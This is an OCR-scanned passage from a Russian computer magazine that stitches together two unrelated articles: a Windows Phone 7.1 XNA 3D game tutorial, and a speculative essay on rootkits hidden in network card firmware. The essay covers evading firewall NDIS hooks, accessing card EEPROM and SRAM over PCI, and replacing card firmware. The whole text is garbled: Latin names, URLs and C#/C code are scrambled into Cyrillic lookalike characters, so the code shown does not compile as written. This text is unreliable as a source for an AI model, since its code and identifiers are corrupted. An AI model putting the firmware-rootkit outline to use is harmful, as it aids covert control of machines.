ѴѴР, ,І\ІЕТ Егатеѵѵогк4.0, ЗіІѵегІідЫ 4.0, ХІЧА4.0, ѴѴіпсІоѵѵз 
РЬопе Етиіаіог. Еще на машине, которую будешь исполь- 
зовать для разработки и отладки (с помощью эмулятора) 
игр для ѴѴР 7.1 , должна быть установлена видеокарта с 
поддержкой ОігесіХ 1 0. 

В качестве настольной операционной системы должна 
выступать либо ѴѴіпсІоѵѵз Ѵізіа со вторым сервис-паком, 
либо ѴѴіпсІоѵѵз 7 — причем Віагіег Ебіііоп не поддержи- 
вается (только не подумай, что я вообще предположил о 
возможности ее использования :)). 

Новая версия пакета разработчика, совместно с Ѵ5 2010, 
кроме языка С# включает поддержку Ѵізиаі Вазіс — те- 
перь его можно использовать для написания мобильных 
программ. После установки ѴѴР-тулз, запусти Ѵ5 201 0 и 
просмотри шаблоны для создания аппликаций (рис. 1 ). 

ХЫАѵз.ЗіІѵегІідМ 

Для создания приложений под ѴѴіпсІоѵѵз РЬопе исполь- 
зуются две подсистемы: ЗіІѵегІідЫ и ХІ\ІА. Обе эти под- 
системы работают под .ЫЕТ. Следовательно, в ѴѴіпсІоѵѵз 
РЬопе исполняется только безопасный код. В первую 
очередь, ЗіІѵегІідЫ используется для построения 
пользовательского интерфейса (втом приближении, о 
котором мы привыкли говорить, при разработке оконно- 
го интерфейса в ѴѴіпсІоѵѵз). Таким образом, посредством 
языка разметки ХАМЕ осуществляется построение 
пользовательского интерфейса для смартфона, в Ѵ5 
можно использовать визуальные средства. В контексте 
нашего рассмотрения этой платформы (для разработки 
приложений с динамической графикой), эта функцио- 
нальность нас не вполне устраивает. С другой стороны, 



ХІ\ІА специально предназначена для разработки игр. 
Ктомуже в одном приложении можно комбинировать 
обе подсистемы (обрати внимание на шаблон ѴѴіпсІоѵѵз 
РЬопе РісЬ ОгарЫсз Арріісаііоп (4.0)). 

Следуя нашей главной цели, подробнее рассмотрим 
фреймворкХІМА. В настоящее время существуетуже чет- 
вертая его версия. ХЫА— прямой потомок ОігесіХ. На сча- 
стьеавтора, он был свидетелем всего пути развития этой 
технологии, начиная стого момента, когда она находилась 
в состоянии зародыша и до настоящего момента, когда 
она превратилась в межплатформенный инструмент для 
создания игр. Так, сейчасу МісгозоІІ естьтри платформы, 
которые ее поддерживают: десктопная ѴѴіпсІоѵѵз, консоль 
ХЬохЗбО итеперь — смартфоновская ОС ѴѴіпсІоѵѵз РЬопе 7.x. 
То есть, игра, написанная для ѴѴіпсІоѵѵз, при соблюдении 
определенныхусловий будет работать на двух других плат- 
формах. Чуть позже мы рассмотрим эти условия, а сейчас я 
скажу пару слов о «зародышевым состоянии»ХІ\ІА. 

После выхода программной платформы ,І\ІЕТ Егатеѵѵогк 
(2002 год) создание игр, выполняющихся под ней и 
использующих ее возможности (в первую очередь, 
сборщика мусора), было вопросом времени, потому что 
почти одновременно последовал выход Мападеб Оі гес1:Х 
— управляемый ОігесіХ, выполняющийся в среде ,І\ІЕТ. 
Атот ОігесіХ, который использовался в нативных С++- 
приложениях, соответственно, стал неуправляемым. За- 
тем вышел МОХ2.0. Однако он не пользовался популярно- 
стью: среди игроделов ходило мнение, что выполняемый 
под виртуальной машиной (чем, по сути, является ,І\ІЕТ) 
код работает медленнее нативного, что для игр очень 
критично. Впрочем, это вполне оправданное утвержде- 
ние. Тогда Місгобоіі решила сделать изуправляемого 
ОігесіХ нечто большее, чем просто 50К для управляемых 
языков. В 2006 году вышла первая версия ХІ\ІА, которая 
представляла собой не просто улучшенный 50К, а новый 
инструмент, используя который, разрабатывать игры ста- 
ло проще, чем с помощью неуправляемого ОігесіХ. Потому 
что кроме обновленного АРІ, в котором скрыты многие 
низкоуровневые технические детали, необходимые для 
разработки игр (инициализация устройств и др.), ХІ\ІА 
предлагала дополнительныетулзы в помощь игроделам. 

А поскольку игры теперь смогли выполняться под общей 
программной платформой ,І\ІЕТ Егатеѵѵогк, то и запу- 
скаться они могутна разных аппаратных платформах (в то 
время — РС (десктопная ѴѴіпсІоѵѵз) и ХЬох 360). 

ЗО-эксперимент 

Теперь настало время заняться кодингом и написать 
графическое приложение для ѴѴіпсІоѵѵз РЬопе 7.1 . Что 




> СІѴСІ 

• На диске тебя 



ждет дополненный с 
учетом современных 
реалий видеоурок по 
теме. Не пропусти! 

• На диске лежит 
весь исходный код 
разработанного в те- 
чение статьи проекта. 
Также там находится 
весь сопутствующий 
контент. 




стартовая точка для 
ѴѴР разработчика. 




В «Темном искусстве 
игродела» я не на- 
писал о тулзе, которую 
юзал для создания 
ЗР-объектов. Тогда 
она была платная. 
Сейчас ІгиеЗрасе 
распространяется 
бесплатно. Вот ссыл- 
ка: ѵѵѵѵѵѵ.саіідагі.сот . 
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Рис. 3. В процессе работы нашей демонстрации 30 

же нам написать? Наше первое приложение будет демонстраци- 
ей возможностей Зй- визуализации смартфона на базе ѴѴР 7.1 . 
Запусти Ѵ5 201 0 и в качестве шаблона создаваемого приложения 
выбери «Ѵізиаі С# -> ХЫА Ѳате Зіисііо 4.0 -> ѴѴіпсІоѵѵз РЬопе бате 
(4.0)». В результате будет сгенерирована заготовка для разработки 
игры. Обратим внимание на некоторые технические детали. Так как 
для ѴѴР установлено стандартное разрешение экрана (480x800), 
значит, наша графика будет выглядеть одинаково на разных 
девайсах. К тому же ѴѴР поддерживает приемлемую для игр частоту 
кадров — 30 ірз (можно поменять, изменив значение переменной 
ТагдеіЕІарзесІТіте). Хотя на десктопе, на котором ведется разра- 
ботка графического приложения для ѴѴР, должен быть видеоадап- 
тер с поддержкой ЭігесіХ 10, на смартфоне ѴѴР используется 0X9. 
Один из нюансов разработки, переносимых междутремя платфор- 
мами игр, состоит в использовании ЭХ 9. Е> ХЫА явно не указы- 
вается, какая версия йХ используется, зато можно определить 
профильустройства в свойствах проекта. Для РС и ХЬох 360 можно 
использовать профиль НЮеб который соответствует высочайшему 
качеству графики, и соответствует десятой версии йХ. С другой 
стороны, наша целевая платформа ѴѴР не поддерживает этот про- 
филь, поэтому нам придется использовать профиль РеасЬ, который 
соответствует йХ 9 со всеми вытекающими отсюда последствиями. 
Другие нюансы связаны с реализацией контрола, который сильно 
отличается у разных платформ из-за различныхустройств ввода. 
Правда, ХЫ А 4.0 поддерживает все их виды. 

Прямо сейчас скомпилируй и запусти приложение. Если все установ- 
лено правильно, то в запустившемся эмуляторе телефона ты увидишь 
закрашенный монотонным цветом дисплей (рис. 2). 

Закрой эмулятор и подготовь контент для своего приложения 
(можешь взятье нашего диска). Позамыслу в качестве фона будет 
вы ступать текстура. С помощью контент пайплайн загрузи файл 
Ьаскд гои псі .] рд . Да, если не в курсе, контент пайплайн — это меха- 
низм, интегрируемый в студию после установки ХЫА. Основное его 
предназначение — это осуществление прямого доступа к ресурсам 
— контенту игры. То есть, загрузив в него, например, текстуру, можно 
напрямую обращаться к ней, не обращая внимания на реальное ее 
расположение. Дополнительно при его использовании определен- 
ный ресурс будетзагружен в память только единожды, и не получится 
ситуации, когда один итотже объект будет за гружен повторно. 

После загрузки текстуры попробуй вывести ее на экран эмулятора 
смартфона, для этого потребуется написать всего несколько строчек 
кода. Во-первых, открой в студии файл Оатеі .сз, и в конструкторе 
класса Оатеі задай параметры экрана: 

іііііб .§парІііс5 . Рпе-РепгесІВаскВи-р-РегНеі§ІтІ: = 480; 

ѢИІ5 .§парІііс5 . Рпе-РеггесІВаскВи-р-РегІлІісІІіІі = 800; 

ІФіб .§гарІііс5 . ІзРиІІБсгееп = 1:гие; 

Таким образом, мы устанавливаем альбомный режим экрана. За- 
тем в функции І_оасІСопІепШ после создания объекта зргіІеВаісб 
добавь следующую строчку кода: Ьаск§гоипсІ = Соп1:еп1:. 
ІоаскТех1:иге20>( "Тех1:иге5/Ьаск§гоипсГ );. С ее помощью происхо- 
дитзагрузка текстуры в память. Пролистай листинг вниз до функции 
Огаѵѵ, после комментария ТОРО добавь такие три строчки: 



5рпі1:еВа1:сІі . Ве§іп( ) ; 

5рпі1:еВа1:сІі .Огам(Ьаск§гоипсД пем Кес1:ап§1е 
(0, 0, 800, 480), СоІог.ІлІЬие); 

зргі1:еВа1:сІі.ЕпсІ(); 

Для прорисовки текстуры используется ранее созданный объ- 
ект ЗргіІеВаІсЬ: первый метод — Вед і п данного объекта начинает 
группу операций рисования (в нашем случаетолько одну), используя 
одинаковые настройки, они задаются в параметрах метода. В нашем 
примереу него нет параметров. Затем метод йгаѵѵ выводитзагружен- 
ную ранее текстуру. В данном примереу него три параметра (какиу 
предыдущего метода, имеются перегруженные варианты): указатель 
на прорисовываемую текстуру, объект — прямоугольнике параме- 
трами для вывода и цвет для придания оттенка (белый — не играет 
значения). Последний метод сбрасывает на задний буфер (хе-хе, «за- 
дний буфер» — это круто, Бивис — прим, ред.) содержимое объекта 
класса ЗргіІеВаІсЬ и восстанавливаетего состояние, предшествую- 
щее вызову метода Вед і п . 

Откомпилируй и проверь: весь дисплей должна покрыть указанная 
текстура. Далее добавим трехмерные объекты. ХЫА поддержи- 
вает для загрузки два формата: файлы *.х и *.1Ъх. Формат X ранее 
был стандартным для ОігесіХ, однако, начиная с десятой версии 
библиотеки, этот формат потерял поддержку. Кслову, теперьтам 
используется формат *.зсІкте5Ь, для которого не существует экс- 
портеров. Но М іеговой не оставила свой новый формат в таком 
плачевном состоянии и выпустила конвертер — утилиту командной 
строки тезЬсопѵегІ, который предназначен для конвертирования 
изХ в зсіктезб. Второй формат — * .бЬх — очень распространен и 
поддерживается всеми продуктами от Аиіосіезк. По сути, он являет- 
ся форматом для переноса моделей между приложениями. Теперь у 
тебя точно не возникнет проблем с созданием собственных моделей 
для своих игр. С диска можешь взять подготовленную мною модель 
(я взял из ІгиеЗрасето, что было). Она находятся в Х-формате. 
Загрузи ее в контент пайплайн, соблюдая структуру каталогов, то 
есть та к, чтобы во внешнем каталоге находился х-файл и на этом же 
уровне — одноименная папка с текстурами. Еще одна замечатель- 
ная возможность контент пайплайна — это компиляция контента 
в свой собственный оптимальный для исполнения формат. При 
первой загрузке приложения контент пайплайн просматривает все 
имеющие файлы, и если какой-то объект может быть преобразован, 
он преобразует его. 

Сейчас можно сначала попробовать загрузить и вывести на экран 
модель, но я предлагаю этого не делать, а сразу разработать класс 
для реализации возможности создания нескольких объектов без 
дублирования кода. Создай новый файл обіесЕсг и напиши в нем 
код одноименного класса, он инкапсулирует функциональность 
создаваемых объектов (для подсказки смотри исходник с диска). 
Пока ты его пишешь, я коротко расскажу, что здесь происходит. 
Вначале, как всегда, происходит подключение пространств 
имен — обрати внимание, используется пространство ХЫА. Затем 
уже в описании класса объявляются и инициализируются пере- 
менные — члены класса. Далее идет конструктор. Безусловно, в 
нашем примере можно было обойтись без него, потому что пере- 
менные уже инициализированы, и с созданием объекта прекрасно 
бы справился конструктор по умолчанию. Однако, поскольку у нас 
два объекта этого класса, то необходимо поместить их в разные 
координаты. Этим и занимается конструктор, получая в качестве 
параметра множитель для смещения. Дальше идет одна из моих 
любимейших конструкций языка С# — свойство. Его устройство 
напоминает мне разработку визуальных компонентов для ОеІрЫ :). 
Метод установки значения данного свойства довольно обширен, 
он производит преобразование переданного угла из градусной 
меры в радианную, используемую вХЫА, а последним шагом соз- 
дает матрицу поворота по оси Уи присваивает ее переменной- 
члену класса. Затем идет метод ОгамОбд который прорисовывает 
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модель, хранящуюся в переменной тосіеі. В начале этого метода 
путем перемножения матрицы сдвига и матрицы вращения созда- 
ется целевая матрица перемещения объекта. После этого в цикле 
ІюгеасЬ перебираем все меши объекта, чтобы затем во вложенном 
цикле через умножение матрицы текущего меша на полученную 
на предыдущем шаге матрицу получить мировую матрицу. Все эти 
трансформации нужны для корректного отображения объекта в 
пространстве. Объект класса ВазісЕДесІ: кроме собственно про- 
странственной матрицы содержит многие другие свойства: тек- 
стурные координаты, альфа-составляющую материала, параметры 
для освещения, видовую матрицу, матрицу проекции и многое 
другое. Вообще, этот объект предоставляет возможности такого 
механизма, который раньше в ОігесіХ назывался фиксированным 
конвейером визуализации. Но, начиная с йХ 10, его напрочьуда- 
лили, оставив только программируемый конвейер. Для того чтобы 
с его помощью визуализировать хоть что-то, надо писать свои 
шейдеры. Конечно, это позволяет добиться наилучших результа- 
тов, однако иногда вполне подходят стандартные механизмы. В 
ХІМАтоже имеется программируемый конвейер, но мы его рассма- 
тривать сегодня не будем. Последняя операция метода ОгаѵѵОЬ) 
(также находящаяся в цикле ІюгеасЫ выводит меш в задний буфер. 
Единственное действие, выполняемое методом ІІрсІаІеБіаІе, — это 
обновление позиции объекта в пространстве путем скалярного 
умножения вектора направления вперед матрицы гоіМаІ-объекта 
и переданного в параметре значения. Последний метод класса 
БеІирЕ^есІз вызывается лишь единожды — при инициализации. В 
него передаются матрицы проекции и вида, которые впоследствии 
присваиваются эффекту каждого меша модели. Также, для каждо- 
го меша включается стандартное освещение. Результат операции 
присваивается переменной — члену 1га пз, которая участвует в 
построении объекта (в процессе метода ОгаѵѵОЬі (см. выше). 
Прежде чем запускать построение проекта, надо внести изменения 
в класс Оатеі , который генерируется автоматом и наследуется от 
МісгозоІІ.Хпа.Егаппеѵѵогк.Ѳаппе, перегружая некоторые его методы. И 
снова исходнике диска тебе в помощь, здесьже кратко расскажу, что 
там к чему. В начале класса Оатеі объявляем все глобальные пере- 
менные — так, например, объект класса ОЬ)есі — ОЬ^есІ: сагі = пем 
ОЬ]ес1:(20); передавая смещение параметром, здесьже находятся 
объявления матриц вида и проекции, они будут инициализированы 
позже. Конструктор класса уже рассмотрен. В функции инициализа- 
ции производим матрицы: 

рго]'ес1;іопМа1:гіх = Маігіх.СгеаіеРегзресІііѵеРіеІсІО-РѴіеіл/ 
(Ма-ЦіНеІрег .ТоКасІіап5(45.0-Р) ,а5рес1:Ка1:іо.,1.0-ІД 100.0-Р) ; 

ѵіемМаігіх = Ма1:гіх.Сгеа1:еІ_оокА1:(сатегаРо5І1:іоп., 
ѴесіогЗ.Іего, ѴесіогЗ .ІІр) ; 

Для создания матрицы проекции передаем: поле видимости по 
оси У в радианах, соотношение сторон экрана (объявлено ра- 
нее), расстояние до ближней и дальней плоскости отсечения. В 
создании видовой матрицы участвуюттакие значения: позиция 
камеры (объявлена ранее — триплет значений, представляющий 
координаты Х,Ѵ,2), направление вида камеры и вектор обзо- 
ра вверх, относительно текущему виду. В методе І_оасІСопІепІ 
происходит за грузка ресурсов, так модель для объекта наше- 
го класса загружается такой строчкой: сагі. тосіеі = Сопіепі:. 
ІоаскМогіе1>( м МогіеІ5/НоігосГ); Сразу после загрузки вызывается 
метод объекта для установки преобразований мешей модели: 
сагІ.БеіирЕ-р-РесізСргозесІііопМаІігіх., ѵіемМаігіх) ; , для которого 
передаются ранее созданные матрицы. В методе Іірсіаіе, который 
подобно методу Огаѵѵ вызывается при перерисовки каждого кадра, 
осуществляется трансформация наших объектов класса О^есС 
Дополнительно в нем вызывается функция II рсіаіеі п риі, которая 
детектит нажатие левой клавиши мыши, и в результате увеличи- 
вает скорость вращения и перемещения объектов, инкрементируя 
значения переменных. Последний метод Огаѵѵ выводит все на 



экран. Сначала он очищает — закрашивает задний буфер сплош- 
ным цветом, затем выводиттекстуру и два объекта класса О^есі. 
Последняя строчка метода Ьа5е.йгаы(§атеТіте) ; меняет положе- 
ния первичного и заднего буферов. В итоге все, что визуализиро- 
вал ось там, теперь на нашем экране. 

Сейчас самое время откомпилировать и протестировать проект. В 
том случае, если все сделано правильно, ты увидишьта кую демон- 
страцию Зй на дисплее эмулятора (рис. 3). 

Звуки 

Напоследокдобавим звук. Возьми какой-нибудь *.ѵѵаѵ-файл (напри- 
мер, с диска) и загрузи его в контент пайплайн. Объявитри перемен- 
ных: одну для загрузки звука, вторую — для осуществления контрола 
над проигрыванием, и последнюю — для состояния проигрывания: 

БоипсІЕ-р-РесІ: зоипсі; //звук 

БоипсІЕ-р-РесіІпБІіапсе зоипсІСопІігоІ; //управление звуком 
Ьооі ізРІау = -Раізе; //индикатор проигрывания музыки 

Затем в функции І_оасІСопІепІ загрузи звук, создай объект для управ- 
ления загруженным звуком, зацикли его воспроизведение и начни 
проигрывать: 

5оипсІ= Сопіепі: . ЬоаскБоипсІЕ-р-РесІ:^ "МиБІс/з'еіБѲІД" ) ; 
боііпсіСопігоі = боыпсі . Сгеа1:еІп5І:апсе( ) ; 

БоипсІСопІгоІ .І5І_ооресІ = ігие; 

БоипсІСопІгоІ . Ріау ( ) ; 

ІБРІау = ігие; 

Теперь в функцию II рсіаіеі п риі добавь код для остановки и воспроиз- 
ведения музыки по нажатию на кнопку Васкэмулятора: 

і- (СатеРасІ .Се1:51:а1:е(Р1ауегІпсІех.Опе) . ВиТТопБ . Васк == 
ВиТТопБТаТе. РгеББесІ) { 

ІТ (ІБРІау) { 

БоипсІСопігоІ . Раи5е( ) ; 

ІБРІау = ; 

} еІБе { 

БоипсІСопігоІ . Р1ау( ) ; 

ІБРІау = ігие; 

} 

} 

После этого можешь протестировать свой экземпляр. Теперь должна 
проигрываться выбранная мелодия. Да, подготовленный мной звук, 
конечно, вообще не втему, зато бесплатно :)! 

Итоги 

В процессе написания статьи я постарался рассказать тебе об 
основах программирования для ѴѴР 7.1 и, главным образом, о 
создании приложений с динамической трехмерной графикой. Не 
рассмотренными остались многие примечательные механизмы, 
присущие этой платформе: взаимодействие с разными датчиками, 
сервисами и другими аппаратными средствами. При этом я не ста- 
вил перед собой такой цели, я лишь хотел сделать вводный туториал 
о возможностях программирования игр для ѴѴіпсіоѵѵб РЬопе 7.1 . К 
сожалению, рамки статьи не позволили мне рассказать о разработ- 
ке полностью законченной игры, протестировать ее на реальном 
устройстве (ктому же, в период написания статьи устройства с 
ѴѴР7.1 еще не существовало в природе :)) и выложить ее на ѴѴіпсІоѵѵз 
РЬопе Магкеіріасе (отмечу, что за правоторговать в магазине надо 
приобрести лицензию на год за 2900 рублей). Однако я уже работаю 
над этой игрой, и в следующий раз постараюсь детально описать ее 
разработку, чтобыутебя был неисчерпаемый багажзнаний! 

Удачи в выводе денег — ведь пользователи ѴѴіпсІоѵѵз РЬопе привыкли 
платитьза полезные и качественные приложения! ~і~ 
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Фантазии системного программиста 
о создании непобедимого ругкита 

ѳ Представь себе фантасмагорию: твоя сетевая карта 
(или процессор, или видеокарта) живет отдельной жизнью 
шизофреника. И дружит она (или все эти компьютерные потроха 
сразу) против тебя. Возможно ли такое восстание машин, 
инициированное силами хакеров или, скажем, производителей 
железа? Давай пофантазируем! 
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Сетевая карта (N10) 



РНѴ Ыоск 

Обработка 
цифровых 
сигналов 
на портах 
Ейіегпеі 



К 



АЛАС Ыоск 

Обмен сетевы- 
ми фреймами 
с ОС 



РСІ-шина 




— 

Операционная система 



Драйвер N10 Я Процесс 
(минипорт) :||| 



Так схематично проходит процесс обработки сетевых пакетов на уровне N10 <===> РСІ 



Начнем стого, что любой сетевой пакет, пришедший 
из недр сети, прежде чем дойти до твоего браузера или , 
другого сетевого приложения, в первую очередь будет 
обработан твоей сетевой картой, а затем — непосред- 
ственно ядром операционной системы. А вдругэтот 
самый пакет будет нести вместе с собой некие инструк- 
ции, которые тут же подчинят себе всю машину? Ведь для 
этого не нужно писать эксплоиты, искать уязвимости, для 
того чтобы внедрить зловредный код... Просто... отправь 
пакет на какой-либо открытый порт. И — все... Ты уже не 
хозяин своему компьютеру. И плакали крокодильими 
слезами разработчики антивирусных программ и систем 
проактивной защиты - помочь они ничем не смогут. 



Поехали! 

С кажу толь ко одно — есть в сети примеры (внимание!) веб 
и 88Н-серверов, базирующихся на ресурсах одной лишь 
сетевой или графической карты. Да-да, использующих 
ресурсы (микропроцессор и оперативную память) этих 
самых карт [ргооШпк: аІсЬетізІоѵѵІ.ога/аггідо/Рарегз / 
Аггід о-Тгі и І^і - РАС5ЕС08- Рго]ес1:- Гуіа их- 1 1 . рсіі : . а та кже 
гасііогасіаг.п з* пШз/вѵг сгитЬ644 пеТ 

— 

Еслиты до сих пор не понял, о чем речь, повторю: не нуж- 
на операционная система, не нужно ядро, все что нуж- 
но - это микропроцессор сетевой карты, который будет 
обрабатывать приходящие пакеты из сети и что-то там 
отсылать обратно. Представь себе мини-Арасбе, который 
реализован вне контроля ядра за самой машиной, ведь 
сетевая карта, какжелезка, висит где-то на РСІ-шине и 
ей подвластно все ядро операционки 
Страшно, но это еще цветочки, мой дорогой друг. Главное — 
уяснить то, что разработчики отдельных важныхжелезокв 
твоем компьютере, будьто сетевая плата или видеокарта, в 
глубоком секрете держат все скрытые возможности своих 
разработок. Просто вспомни, что такое недокументирован- 
ные возможности операционной системы. Или процессо- 
ра. Или еще какой-нибудьжелезки, полные возможности 
которой хранятся в глубокой тайне от нас, программистов. 



Лезем в недра 

Атеперь представь себе руткит, который живет не 
в операционной системе, а, скажем, втой же самой 



'сетевой карточке. Хотя такое реализовать под силу лишь 
разработчикам самого железа, мы попробуем поставить 
себя на их место и посмотреть, .возможно ли полностью 
контролировать железо втвоем компьютере.или нет? 
Сегодня мы попытаемся рассмотреть эту интересную 
тему сточки зрения системного программиста. Мы 
попробуем ответить на вопрос, как«глубока кроличья 
нора», как глубоко можно залезть в недра операционной 
системы. Бороться с руткитами, живущими в Ггтѵѵаге 
железяктвоего компьютера, наверное, все-таки бес- 
смысленно. Однако ковыряние во внутренностях ядра 
и железа, какты сейчасувидишь, откроет перед тобой, 
много всяких интересных подробностей. 

Обычный перехват сетевого трафика в современных 
файрволах сводится к установкам ЮІ-Ы Б 18-фильтров 
и перехвате важных ЫОІС-функций, таких, как, скажем, 
ЫсІізПедізІегРгоІосоІ. Есть два подхода к перехвату 
сетевого трафика. Первое — это установить, скажем, ТОІ- 
фильтр или N018 ІМ -драй вер и жить себе спокойно. Но 
этот подход не защитит минипорт сетевой карты, который 
является своеобразным форпостом, ибо дальше — ресур- 
сы сетевой карты и сеть. 

Перехват ключевых функций в структуре N О І8_ 
М1М1Р0РТ_ВБ0СК может гарантировать твоей зверюш- 
ке уверенный контроль или модификацию сетевого 
трафика, если бы не одн$*«но» — заполучитьуказатель на 
І\ЮІ8_МІІ\ІІР0РТ_Е>Е0СКой как непросто! Один из самых 
распространенныхспособов получить указатель на ми- 
нипорт — регистрировать свой сетевой протокол в ядре 
вызовом ЫсІізРедІБІегРгоІосоІ, но файрволу достаточно 
перехватить эту функцию, чтобы обломать все попытки 
это сделать. 

Какже быть? 

Казалось бы, способов контроля сети современному 
руткиту остается немного, однако в данной ситуации мало 
кто вспоминаетотаком волшебном слове, как РСІ. Ведь 
сетевая карта «сидит» на РСІ-шине, взаимодействует 
(читай «передает данные») с ядром операционной систе- 
мы именно посредством тех ресурсов, которые РСІ-шина 
ей выделяет 

Сетевая карта (физически) состоит из двух блоков — РНѴ- 
блок и МАС-блок. Первый отвечаетза непосредственное 
«переваривание» сигналов с Р.М5- кабеля в набор байт, 




> сЫ 

На диске ты найдешь 
пару зачетных книг 
в рсГ-формате, по-’ 
священных’описанию 
РСІ-интерфейса, 
кот&рые настоятельно 
•рекомендую к про-’ 
чтению, а также код, 
позволяющий легко’; 
просканировать РСІ- 
шин^найти и описать 
все устройства, 
«висяудие» на шине, 
в том числе регион 
памяти, который вы- 
делен устройству. 




НТТР://ѴШѴѴ 
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> Ііпкз 

Рекомендую к по- 
сещению — 
аісбеппізіоѵѵі.огд/ 
а ггідо/і псіех. Ы:т I . 
сайт Аггідо Тгіиігі, 
там есть немало вкус- 
ностей на тему нагиба 
всяких операционных 
систем. 
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которые для дальнейшей обработки передаются в МАС-блок. Этот 
блок гораздо интереснее, потому что именно он непосредственно от- 
вечаетза взаимодействие с драйвером сетевой карты Минипортом). 
Он обладает одним или двумя СРІІ, ЕЕРРОМ-памятью, собственной 
ЭРАМ-памятью и набором регистров, посредством которыхуправля- 
ется «устройство» сетевой карты. В ЕЕРРОМ, как правило, содержит- 
ся информация о производителе, МАС-адрес сетевой карты, образ 
прошивки. Структура каждого конкретного ЕЕРРОМ имеет недоку- 
ментированный формат и зависит л ишь от фантазии разработчиков 
самой сетевой карты. ЭРАМ-память содержит копию прошивки 
іігтѵѵаге, структуры сетевых пакетов, а также временные буферы 
для хранения приходящих/уходящих сетевых пакетов. Регистры, в 
свою очередь, позволяют полностью контролировать сетевую карту и 
управлять ею. Сколько и>^ и; для чего они служат в каждом конкретном 
случае — та кжезависит от фантазии разработчика, поэтому зачастую 
часть и\них имеет недокументированный формат. 

Главный вопрос статьи — можно ли получить доступ к ЕЕРРОМ, 

ЭРАМ или регистрам? Ответ — да, можно. И сделаем мы это через 
РСІ-интерфейс. 

РС 1-шина поддерживает метод передачи данных, называемый «Іінеаг 
Ьигзі» (метод линейных пакетов). Этот метод предполагает, что пакет 
информации считывается (или записывается) «одним куском», то 
есть адрес автоматически увеличивается для следующего'байта. 
Естественным образом при этом увеличивается скорость передачи 
собственно данныхза счетуменьшения числа передаваемых адресов. 
Шина РСІ является той черепахой, на которой стоят слоны, поддер- 
живающие «Землю» — архитектуру Ріид апб Ріау (РпР). 
Спецификация шины РСІ определяеттри типа ресурсов: два 
обычных («диапазон памяти» и «диапазон ввода/вывода», как их 
называет компания Місгобоіі) и сопбдигабоп зрасе — «конфигура- 
ционное пространство». 

Более подробно о шине РСІ ты сможешь прочесть в замечательной 
книге «РСІ Виэ Оетузіібесі» от .товарища Бойд АЫэоИ, ееты сможешь 
найти на диске к журнал^ 

Именно РС 1-шина, благодаря своим «фундаментальным» особен- 
ностям, позволит нам получить доступ ко всем ресурсам не только 
сетевой карты, но и любого другого устройства, которое сидит на 
РСІ-шине. И при этом мы, находясь втрёзвом уме и не совсемтрез- 
вой памяти :), не задевая такие уровни сетевой инфраструктуры, как 
ТБІ или ІЧБІЭ, где сидят сторожа файрволов, сразузалезем в глотку 
сетевой карте. И никто нам в этом не помешает: все, что нужно будет 
сделать — засандалить драйвер в систему. 

Операционная система для взаимодействия с устройствами на РСІ - 
шине задействует механизм ввода -вывода, основанный на проекции 
участков памяти (тетогу-тарресі 1/0). 

Такой участок памяти, как правило, имеет размер в 64 килобайта. 
Первые 32 килобайта использованы для проекции регистров устрой- 
ства, вторые 32 килобайта представляют собой «окно» с возмож- 
ностями чтения/записи в ЭРАМ-памятьсетевой карты. Всего этого 
вполне хватит, чтобы получить контроль над любым изустройств, 
присутствующих на РСІ-шине. 

Перечислим все устройства на РСІ-шине 

Тог (ЬііБІМитЬег = 0; ! асІаріегРоипсІ && тогеВизез; Ьи5І\ІитЬег++) 

{ 

-Рог (сІеѵісеІМитЬег = 0; 

! асІаріегРоипсІ && сІеѵісеІМитЬег < РСІ_МАХ_0ЕѴІСЕ5; 
сІеѵісеІ\ІитЬег++) { 

БІоіІМитЬег . и . Ьіііб . КезегѵесІ = 0; 

БІоІіІМитЬег . и . Ьіііб .ОеѵісеІМитЬег = сІеѵісеІМитЬег; 

БІоІіІМитЬег. и . Ьіііб . РипсііопІМитЬег = 0; 

1еп§1іЬ = На1СеіВи50аіа(РСІСопРі§ига1:іогь 
ЬиБІМитЬещ 

БІоІіІМитЬег . и . АбШ-ОІМС, 



сопРі§Іп-Ро і 

5І2ео-Р(РСІ_С0т0М_С0ІМРІС) ); 

} 

} 

Осталась самая малость — разобраться, в смысле, отреверсить 
Е'ЕРРОМ сетевой карты, потому что в нашем случае ЕЕРРОМ — это все. 
Что тут надо иметь в виду? Во-первых, ЕЕРРОМ содержит в себе 
поп-ѵоіаіііе-данные. Во-вторых, эти данные доступны для чтения и 
записи через набор регистров сетевой карты. Ну и в-третьих, надо 
помнить, что формат ЕЕРРОМ практически никем из производите- 
лей сетевых карт не документируется. Что мызнаемо ЕЕРРОМ? Он 
содержит в себе, как правило, за головок за грузчика, метаданные 
5 «устройства» сетевой карты, данные о конфигурации сетевой карты, 
такие как МАС-адрес, и самое главное — набор б гтѵѵаге- имиджей, 
то есть: код загрузчика, дефолтный имидж, РХЕ (РгеЬооІ еХесиііоп 
Епѵігоптепі, хрень для возможности «загрузки компьютера с ис- 
пользованием сетевого интерфейса») и много всего прочего. 

Теперь надо ответить на вопрос, как имидж Ітітѵѵаге загружается из 
ЕЕРРОМ в память? Очень просто — надо перегрузить сетевую карту 
и остановить процессор как можно скорее! Разумеется, делать это 
надо с использованием ПО, поддерживающего эмуляцию физи- 
ческих устройств :). Что в результате? В результате можно увидеть, 
*что каждый раз, когда происходит подключение сетевой карты (или 
перезагрузка РЩ-шины): 

а. Процессор инициализирует ЕЕРРОМ и и загружает за грузчик 
бгтѵѵаге (простите за тавтологию) из ЕЕРРОМ. 

б. Выполняет кодзагрузчикабгтѵѵаге.то есть конфигурируетядро сете- 
вой карты, настраивая часы, потребление энергии и прочее; после чего 
загружает на исполнение «вторую очередь» бгтѵѵаге, которая является 
дефолтным основным имиджем сетевой карты; после чегонастраивает 
все остальное — МАС-адрес и прочие особенности сетевой карточки. 
Вот, в принципе, и все, что нужно знать и процессе загрузки имиджа 
сетевой карты. И наконец, отвечу на возрос, который, наверное, дав- 
но вертится у тебя в голове: можно ли сделать такой руткит, который 
сможет заразить сетевую или графическую карту? Ответ прост: да, 
это можно сделать, хотя и очень-очень непросто. Несмотря на то,- 
что такой руткит будет весьма опасным и живучим, он с может житѣ 
лишь на конкретной марке сетевой карты отоднот^производителя. 
Для разработки такого руткита нужнр сдампить бптшѵаге, отре- 
версить его, разобраться в принципах работы регистров... А затем 
написать свое собственное бгтѵѵаге, которое и будетзаменено 

на оригинальное. Сделать это крайне сложно, хотя и возможно. В 
сети, если хорошенько поискать, можно найти реальные примеры 
программулек, которые могут заставить сетевую карту жить двойной 
жизнью. Однако, повторюсь, это всего лишь РоС, который привязан к 
конкретной модели сетевой карты. 

Ачто насчеі" контроля за сетевыми картами без варианта инсталляции 
руткита? Ненамного проще! Универсального способа, который бы 
